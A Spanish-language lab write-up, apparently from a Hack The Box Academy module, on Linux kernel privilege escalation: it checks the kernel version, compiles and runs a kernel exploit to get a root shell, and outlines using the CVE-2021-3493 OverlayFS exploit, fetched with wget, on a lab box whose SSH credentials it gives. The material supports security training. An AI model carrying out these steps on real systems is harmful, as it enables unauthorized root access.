🐧Exploits del Kernel - Linux

Existen vulnerabilidades de nivel de kernel para una variedad de versiones del kernel de Linux. Un ejemplo muy conocido es Dirty COW (CVE-2016-5195). Estas vulnerabilidades aprovechan las vulnerabilidades del kernel para ejecutar código con privilegios de root. Es muy común encontrar sistemas que son vulnerables a vulnerabilidades del kernel. Puede resultar difícil realizar un seguimiento de los sistemas antiguos, y pueden quedar excluidos de la aplicación de parches debido a problemas de compatibilidad con determinados servicios o aplicaciones.

La escalada de privilegios mediante un exploit del kernel puede ser tan sencilla como descargarlo, compilarlo y ejecutarlo. Algunos de estos exploits funcionan de inmediato, mientras que otros requieren modificaciones. Una forma rápida de identificar los exploits es emitir el comando uname -ay buscar la versión del kernel en Google.

Nota: Las vulnerabilidades del kernel pueden causar inestabilidad en el sistema, por lo que se debe tener cuidado al ejecutarlas en un sistema de producción.

---

Explotación del kernel

Comencemos por verificar el nivel del kernel y la versión del sistema operativo Linux.

afsh4ck@htb$ uname -a

Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

afsh4ck@htb$ cat /etc/lsb-release 

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"

Podemos ver que estamos en Linux Kernel 4.4.0-116 en una caja Ubuntu 16.04.4 LTS. Una búsqueda rápida en Google de "PoC" linux 4.4.0-116-generic exploit nos muestra este exploit. A continuación, lo descargamos al sistema mediante wget u otro método de transferencia de archivos. Podemos compilar el código del exploit mediante gcc y configurar el bit ejecutable mediante chmod +x.

afsh4ck@htb$ gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit

A continuación, ejecutamos el exploit y, con suerte, logramos ingresar a un shell root.

afsh4ck@htb$ ./kernel_exploit 

task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shell

Finalmente podemos confirmar el acceso root a la máquina:

root@htb# whoami

root

---

Caso práctico

SSH a 10.129.35.214 (ACADEMY-LPE-NIX02)
Usuario "htb-student"
Contraseña "Academy_LLPE!"

Aumentar los privilegios utilizando un exploit de kernel diferente. Enviar el contenido del archivo flag.txt en el directorio /root/kernel_exploit.

Verificar versión del Kernel

htb-student@NIX02:~$ uname -a
Linux NIX02 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

htb-student@NIX02:~$ cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.6 LTS"

Búsqueda de exploits

Buscando en Google encontramos el siguiente exploit:

GitHub - briskets/CVE-2021-3493: Ubuntu OverlayFS Local PrivescGitHub

Vamos a usarlo de la siguiente manera:

1. Nos descargamos el repositorio en local

2. Entramos al directorio

3. Creamos un servidor local con python para enviar el exploit

4. Recibimos el exploit con wget

5. Compilamos el exploit con gcc y le damos permisos de ejecución

6. Ejecutamos el exploit

7. Recibimos un shell de root

8. Accedemos al directorio /root y nos hacemos con la flag